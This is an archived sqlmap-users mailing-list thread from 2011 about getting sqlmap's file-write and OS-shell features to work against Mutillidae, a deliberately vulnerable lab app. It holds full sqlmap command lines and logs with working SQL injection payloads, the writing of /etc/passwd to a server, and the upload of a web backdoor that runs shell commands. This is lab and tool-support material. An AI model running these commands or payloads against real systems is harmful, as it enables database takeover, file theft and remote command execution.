[Y/n] > > [23:26:37] [WARNING] the testable parameter 'view_user_name' you > > provided is not inside the GET > > [23:26:37] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > > as session file > > [23:26:37] [INFO] flushing session file > > [23:26:37] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > > as results file > > [23:26:37] [INFO] heuristics detected web page charset 'ascii' > > [23:26:37] [INFO] testing if the url is stable, wait a few seconds > > [23:26:38] [INFO] url is stable > > [23:26:38] [INFO] heuristic test shows that POST parameter > > 'view_user_name' might be injectable (possible DBMS: MySQL) > > [23:26:38] [INFO] testing sql injection on POST parameter > 'view_user_name' > > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING > > clause (Generic comment)' > > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based > > blind - WHERE or HAVING clause (Generic comment)' injectable > > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > > HAVING clause' > > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or > > HAVING clause' > > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING > clause' > > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' > > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR > > error-based - WHERE or HAVING clause' injectable > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' > > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy > query)' > > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' > > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > > [23:26:43] [INFO] target url appears to be UNION injectable with 4 > columns > > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > > query (NULL) - 1 to 10 columns' injectable > > [23:26:43] [WARNING] in OR boolean-based injections, please consider > > usage of switch --drop-set-cookie if you experience any problems > > during data retrieval > > POST parameter 'view_user_name' is vulnerable. Do you want to keep > > testing the others? [y/N] > > sqlmap identified the following injection points with a total of 148 > > HTTP(s) requests: > > --- > > Place: POST > > Parameter: view_user_name > > Type: boolean-based blind > > Title: OR boolean-based blind - WHERE or HAVING clause (Generic > comment) > > Payload: view_user_name=-5244' OR NOT (1884=1884)-- > > &password=bDXj&Submit_button=Submit > > > > Type: error-based > > Title: MySQL OR error-based - WHERE or HAVING clause > > Payload: view_user_name=-3024' OR 1 GROUP BY > > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 > > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- > > &password=bDXj&Submit_button=Submit > > > > Type: UNION query > > Title: MySQL UNION query (NULL) - 1 to 10 columns > > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, > > > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) > > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, > > NULL#&password=bDXj&Submit_button=Submit > > --- > > > > do you want to exploit this SQL injection? [Y/n] > > [23:26:46] [INFO] testing MySQL > > [23:26:46] [INFO] confirming MySQL > > [23:26:46] [INFO] the back-end DBMS is MySQL > > > > web application technology: PHP 5.2.6, Apache 2.2.9 > > back-end DBMS: MySQL >= 5.0.0 > > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system > > [23:26:46] [INFO] the back-end DBMS operating system is Linux > > [23:26:46] [WARNING] if the problem persists with 'None' values please > > try to use hidden switch --no-cast (fixing problems with some > > collation issues) > > do you want confirmation that the file '/tmp/test' has been > > successfully written on the back-end DBMS file system? [Y/n] > > [23:26:48] [INFO] the file has been successfully written and its size > > is 1848 bytes, but the size differs from the local file '/etc/passwd' > > (1845 bytes) > > [23:26:48] [WARNING] expect junk characters inside the file as a > > leftover from UNION query > > [23:26:48] [INFO] you can find results of scanning in multiple targets > > mode inside the CSV file > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > > > > [*] shutting down at 23:26:48 > > --8<-- > > > > Cheers, > > Bernardo > > > > > > On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote: > >> Hi > >> > >> I'm playing with file writing. I have a full privs root user set up in > >> mysql and am using > >> > http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 > >> to play with. I've set up a /temp folder below the web root of the app. > >> I've put a file "evil.php" in the sqlmap working directory. I've also > >> changed the permissions for all users on the temp folder to write access > >> allowed. > >> > >> I'm using the following input to try and upload this file: > >> > >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u > >> "http://localhost/mutillidae/ind > >> ex.php?page=user-info.php" --data > >> "username=&password=&user-info-php-submit-butt > >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" > >> --file-wr > >> ite "evil.php" --file-dest "temp/evil.php" > >> > >> This is with the latest dev build by the way. > >> > >> The output I get is: > >> > >> [18:00:03] [INFO] the back-end DBMS is MySQL > >> web server operating system: Windows > >> web application technology: PHP 5.3.5, Apache 2.2.17 > >> back-end DBMS: MySQL 5.0 > >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system > >> [18:00:03] [INFO] the back-end DBMS operating system is Windows > >> [18:00:04] [WARNING] if the problem persists with 'None' values please > try > >> to us > >> e hidden switch --no-cast (fixing problems with some collation issues) > >> do you want confirmation that the file 'temp/evil.php' has been > successfully > >> wri > >> tten on the back-end DBMS file system? [Y/n] > >> [18:00:12] [WARNING] it looks like the file has not been written, this > can > >> occur > >> if the DBMS process' user has no write privileges in the destination > path > >> [18:00:12] [WARNING] expect junk characters inside the file as a > leftover > >> from U > >> NION query > >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program > >> Files\sqlm > >> ap-0.9\output\localhost' > >> > >> [*] shutting down at 18:00:12 > >> > >> and sure enough the file isn't written. I've also tried using the > --no-cast > >> switch, to no avail. > >> > >> Does anyone have any ideas on what could be going wrong here? I can use > the > >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd > and > >> --os-pwn commands also fail at the stager upload phase, probably for > similar > >> reasons. > >> > >> Any help would be appreciated > >> > >> Cheers > >> > >> Chris > >> > >> > >> > ------------------------------------------------------------------------------ > >> All of the data generated in your IT infrastructure is seriously > valuable. > >> Why? It contains a definitive record of application performance, > security > >> threats, fraudulent activity, and more. Splunk takes this data and makes > >> sense of it. IT sense. And common sense. > >> http://p.sf.net/sfu/splunk-d2d-c2 > >>_______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > >> > > > > > > > > -- > > Bernardo Damele A. G. > > > > E-mail / Jabber: bernardo.damele (at) gmail.com > > Mobile: +447788962949 (UK 07788962949) > > PGP Key ID: Unavailable > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 00:01:46
|
Hi Marek, On 5 July 2011 22:33, Stiefenhofer, Marek <M.S...@r-...> wrote: > ... > Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was > curious and had a quick look at it. One of the vulnerable applications has > an MS Access DB and can be UNION based injected. Two of them are Access, the other two are MySQL 4 and MySQL 5.0. We will post the details about our bypass of modsecurity soon and the related tamper scripts will be committed to sqlmap trunk as well. > Unfortunately UNION based tests against MS Access will always fail with > sqlmap, because for UNION based injections the defined comment string > (queries.xml) is not respected. Access needs %00 as comment string and even > this is not working in many cases. This is a known problem. Just addressed, read below. > One quick fix would be adding special Access UNION test definitions to > payload.xml like it has been done for MySQL. Handle of these corner cases specifically to detect a certain technique against a dodgy database management system is in our TODO list already. Also, MSysAccessObjects seems to be a viable option. Detection of UNION query against Access is now fixed. > Another problem is the defined SELECT_FROM for MS Access dbms, it’s > MSysObjects. In the ModSecurity challenge this system table has no read > permissions hence any UNION test must fail. But the system table > MSysAccessXML has read permissions in this specific case. > > Does anyone know, which of the two tables is more likely to have read access > in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML > present in older MS Access versions? No users have read privileges over MSysObjects by default. I can't comment on MSysAccessXML. Anyone else? -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 22:53:02
|
Hi Chris,
No worries.
If you want command execution, sqlmap can handle it automatically also
when it's MySQL and you've got a writable folder within the document
root, --os-cmd and --os-shell. Also, --os-pwn can work in this
scenario too.
The file stager uploaded is 0KB because you provide invalid values to
the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
upload the file stager against MySQL.
See:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php" --data
"view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
--os-shell --flush-session
sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program
[*] starting at 23:49:52
[23:49:52] [INFO] setting file for logging HTTP traffic
[23:49:52] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
as session file
[23:49:52] [INFO] flushing session file
[23:49:52] [INFO] testing connection to the target url
[23:49:52] [INFO] heuristics detected web page charset 'ascii'
[23:49:52] [INFO] testing if the url is stable, wait a few seconds
[23:49:53] [INFO] url is stable
[23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
[23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not dynamic
[23:49:53] [INFO] heuristic test shows that POST parameter
'view_user_name' might be injectable (possible DBMS: MySQL)
[23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause'
[23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
error-based - WHERE or HAVING clause' injectable
[23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
AND time-based blind' injectable
[23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
query (NULL) - 1 to 10 columns' injectable
POST parameter 'view_user_name' is vulnerable. Do you want to keep
testing the others? [y/N]
sqlmap identified the following injection points with a total of 30
HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'ekpw'='ekpw&password=adminpass&Submit_button=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113)
AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND
'TOwv'='TOwv&password=adminpass&Submit_button=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: view_user_name=admin' AND SLEEP(5) AND
'BfoH'='BfoH&password=adminpass&Submit_button=Submit
---
[23:51:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[23:51:31] [INFO] going to use a web backdoor for command prompt
[23:51:31] [INFO] fingerprinting the back-end DBMS operating system
[23:51:31] [INFO] the back-end DBMS operating system is Linux
[23:51:31] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[23:51:32] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[23:51:32] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload
the agent [Enter for None]: /var/www/test
[23:51:35] [WARNING] unable to upload the file stager on '/var/www'
[23:51:35] [INFO] the file stager has been successfully uploaded on
'/var/www/test' - http://debian32:80/test/tmpugbmo.php
[23:51:35] [INFO] the backdoor has probably been successfully uploaded
on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
[23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'uid=33(www-data) gid=33(www-data)
groups=33(www-data)'
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output: '/var/www/test'
os-shell> exit
[23:51:44] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[23:51:44] [INFO] Fetched data logged to text files under
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
[*] shutting down at 23:51:44
--8<--
Cheers,
Bernardo
On 6 July 2011 23:46, <chr...@gm...> wrote:
> Hi
>
> Thanks. It turns out I was being an idiot. With absolute paths I didn't realise that this also includes the destination file name. With that included, it works like a dream.
>
> What I haven't managed to get going properly yet is the --os-cmd flag. The temp stager file does appear, but is empty, 0KB. However; I think I'll save that one for another day!
>
> Regards
>
> Chris
> ------------------
>
> -----Original Message-----
> From: "Bernardo Damele A. G." <ber...@gm...>
> Date: Wed, 6 Jul 2011 23:42:22
> To: Chris Oakley<chr...@gm...>
> Cc: <sql...@li...>
> Subject: Re: [sqlmap-users] File Writing
>
> Hi Chris,
>
> To me it works well:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
> view_user_name --risk 3 --level 3 --parse-errors --file-write
> /etc/passwd --file-dest /tmp/test --flush-session
>
> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 23:26:35
>
> [23:26:35] [INFO] setting file for logging HTTP traffic
> [23:26:35] [INFO] testing connection to the target url
> [23:26:35] [INFO] heuristics detected web page charset 'ascii'
> [23:26:35] [INFO] searching for forms
> [#1] form:
> POST http://debian32:80/mutillidae/index.php?page=user-info.php
> POST data: view_user_name=&password=&Submit_button=Submit
> do you want to test this form? [Y/n/q]
>>
> Edit POST data [default:
> view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
> detected):
> do you want to fill blank fields with random values? [Y/n]
> [23:26:37] [WARNING] the testable parameter 'view_user_name' you
> provided is not inside the GET
> [23:26:37] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> as session file
> [23:26:37] [INFO] flushing session file
> [23:26:37] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> as results file
> [23:26:37] [INFO] heuristics detected web page charset 'ascii'
> [23:26:37] [INFO] testing if the url is stable, wait a few seconds
> [23:26:38] [INFO] url is stable
> [23:26:38] [INFO] heuristic test shows that POST parameter
> 'view_user_name' might be injectable (possible DBMS: MySQL)
> [23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
> [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
> [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> clause (Generic comment)'
> [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
> blind - WHERE or HAVING clause (Generic comment)' injectable
> [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause'
> [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
> HAVING clause'
> [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
> [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
> [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
> error-based - WHERE or HAVING clause' injectable
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
> [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
> [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> query (NULL) - 1 to 10 columns' injectable
> [23:26:43] [WARNING] in OR boolean-based injections, please consider
> usage of switch --drop-set-cookie if you experience any problems
> during data retrieval
> POST parameter 'view_user_name' is vulnerable. Do you want to keep
> testing the others? [y/N]
> sqlmap identified the following injection points with a total of 148
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: view_user_name
> Type: boolean-based blind
> Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
> Payload: view_user_name=-5244' OR NOT (1884=1884)--
> &password=bDXj&Submit_button=Submit
>
> Type: error-based
> Title: MySQL OR error-based - WHERE or HAVING clause
> Payload: view_user_name=-3024' OR 1 GROUP BY
> CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
> ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
> &password=bDXj&Submit_button=Submit
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 1 to 10 columns
> Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
> CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
> AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
> NULL#&password=bDXj&Submit_button=Submit
> ---
>
> do you want to exploit this SQL injection? [Y/n]
> [23:26:46] [INFO] testing MySQL
> [23:26:46] [INFO] confirming MySQL
> [23:26:46] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.2.6, Apache 2.2.9
> back-end DBMS: MySQL >= 5.0.0
> [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
> [23:26:46] [INFO] the back-end DBMS operating system is Linux
> [23:26:46] [WARNING] if the problem persists with 'None' values please
> try to use hidden switch --no-cast (fixing problems with some
> collation issues)
> do you want confirmation that the file '/tmp/test' has been
> successfully written on the back-end DBMS file system? [Y/n]
> [23:26:48] [INFO] the file has been successfully written and its size
> is 1848 bytes, but the size differs from the local file '/etc/passwd'
> (1845 bytes)
> [23:26:48] [WARNING] expect junk characters inside the file as a
> leftover from UNION query
> [23:26:48] [INFO] you can find results of scanning in multiple targets
> mode inside the CSV file
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
>
> [*] shutting down at 23:26:48
> --8<--
>
> Cheers,
> Bernardo
>
>
> On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote:
>> Hi
>>
>> I'm playing with file writing. I have a full privs root user set up in
>> mysql and am using
>> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
>> to play with. I've set up a /temp folder below the web root of the app.
>> I've put a file "evil.php" in the sqlmap working directory. I've also
>> changed the permissions for all users on the temp folder to write access
>> allowed.
>>
>> I'm using the following input to try and upload this file:
>>
>> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
>> "http://localhost/mutillidae/ind
>> ex.php?page=user-info.php" --data
>> "username=&password=&user-info-php-submit-butt
>> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"
>> --file-wr
>> ite "evil.php" --file-dest "temp/evil.php"
>>
>> This is with the latest dev build by the way.
>>
>> The output I get is:
>>
>> [18:00:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Windows
>> web application technology: PHP 5.3.5, Apache 2.2.17
>> back-end DBMS: MySQL 5.0
>> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
>> [18:00:03] [INFO] the back-end DBMS operating system is Windows
>> [18:00:04] [WARNING] if the problem persists with 'None' values please try
>> to us
>> e hidden switch --no-cast (fixing problems with some collation issues)
>> do you want confirmation that the file 'temp/evil.php' has been successfully
>> wri
>> tten on the back-end DBMS file system? [Y/n]
>> [18:00:12] [WARNING] it looks like the file has not been written, this can
>> occur
>> if the DBMS process' user has no write privileges in the destination path
>> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
>> from U
>> NION query
>> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
>> Files\sqlm
>> ap-0.9\output\localhost'
>>
>> [*] shutting down at 18:00:12
>>
>> and sure enough the file isn't written. I've also tried using the --no-cast
>> switch, to no avail.
>>
>> Does anyone have any ideas on what could be going wrong here? I can use the
>> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and
>> --os-pwn commands also fail at the stager upload phase, probably for similar
>> reasons.
>>
>> Any help would be appreciated
>>
>> Cheers
>>
>> Chris
>>
>>
>> ------------------------------------------------------------------------------
>> All of the data generated in your IT infrastructure is seriously valuable.
>> Why? It contains a definitive record of application performance, security
>> threats, fraudulent activity, and more. Splunk takes this data and makes
>> sense of it. IT sense. And common sense.
>> http://p.sf.net/sfu/splunk-d2d-c2
>>_______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
|
From: <chr...@gm...> - 2011-07-06 22:46:20
|
Hi
Thanks. It turns out I was being an idiot. With absolute paths I didn't realise that this also includes the destination file name. With that included, it works like a dream.
What I haven't managed to get going properly yet is the --os-cmd flag. The temp stager file does appear, but is empty, 0KB. However; I think I'll save that one for another day!
Regards
Chris
------------------
-----Original Message-----
From: "Bernardo Damele A. G." <ber...@gm...>
Date: Wed, 6 Jul 2011 23:42:22
To: Chris Oakley<chr...@gm...>
Cc: <sql...@li...>
Subject: Re: [sqlmap-users] File Writing
Hi Chris,
To me it works well:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
view_user_name --risk 3 --level 3 --parse-errors --file-write
/etc/passwd --file-dest /tmp/test --flush-session
sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program
[*] starting at 23:26:35
[23:26:35] [INFO] setting file for logging HTTP traffic
[23:26:35] [INFO] testing connection to the target url
[23:26:35] [INFO] heuristics detected web page charset 'ascii'
[23:26:35] [INFO] searching for forms
[#1] form:
POST http://debian32:80/mutillidae/index.php?page=user-info.php
POST data: view_user_name=&password=&Submit_button=Submit
do you want to test this form? [Y/n/q]
>
Edit POST data [default:
view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
detected):
do you want to fill blank fields with random values? [Y/n]
[23:26:37] [WARNING] the testable parameter 'view_user_name' you
provided is not inside the GET
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
as session file
[23:26:37] [INFO] flushing session file
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
as results file
[23:26:37] [INFO] heuristics detected web page charset 'ascii'
[23:26:37] [INFO] testing if the url is stable, wait a few seconds
[23:26:38] [INFO] url is stable
[23:26:38] [INFO] heuristic test shows that POST parameter
'view_user_name' might be injectable (possible DBMS: MySQL)
[23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
clause (Generic comment)'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
blind - WHERE or HAVING clause (Generic comment)' injectable
[23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
error-based - WHERE or HAVING clause' injectable
[23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
[23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
query (NULL) - 1 to 10 columns' injectable
[23:26:43] [WARNING] in OR boolean-based injections, please consider
usage of switch --drop-set-cookie if you experience any problems
during data retrieval
POST parameter 'view_user_name' is vulnerable. Do you want to keep
testing the others? [y/N]
sqlmap identified the following injection points with a total of 148
HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: view_user_name=-5244' OR NOT (1884=1884)--
&password=bDXj&Submit_button=Submit
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: view_user_name=-3024' OR 1 GROUP BY
CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
&password=bDXj&Submit_button=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
NULL#&password=bDXj&Submit_button=Submit
---
do you want to exploit this SQL injection? [Y/n]
[23:26:46] [INFO] testing MySQL
[23:26:46] [INFO] confirming MySQL
[23:26:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[23:26:46] [INFO] fingerprinting the back-end DBMS operating system
[23:26:46] [INFO] the back-end DBMS operating system is Linux
[23:26:46] [WARNING] if the problem persists with 'None' values please
try to use hidden switch --no-cast (fixing problems with some
collation issues)
do you want confirmation that the file '/tmp/test' has been
successfully written on the back-end DBMS file system? [Y/n]
[23:26:48] [INFO] the file has been successfully written and its size
is 1848 bytes, but the size differs from the local file '/etc/passwd'
(1845 bytes)
[23:26:48] [WARNING] expect junk characters inside the file as a
leftover from UNION query
[23:26:48] [INFO] you can find results of scanning in multiple targets
mode inside the CSV file
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
[*] shutting down at 23:26:48
--8<--
Cheers,
Bernardo
On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote:
> Hi
>
> I'm playing with file writing. I have a full privs root user set up in
> mysql and am using
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> to play with. I've set up a /temp folder below the web root of the app.
> I've put a file "evil.php" in the sqlmap working directory. I've also
> changed the permissions for all users on the temp folder to write access
> allowed.
>
> I'm using the following input to try and upload this file:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> "http://localhost/mutillidae/ind
> ex.php?page=user-info.php" --data
> "username=&password=&user-info-php-submit-butt
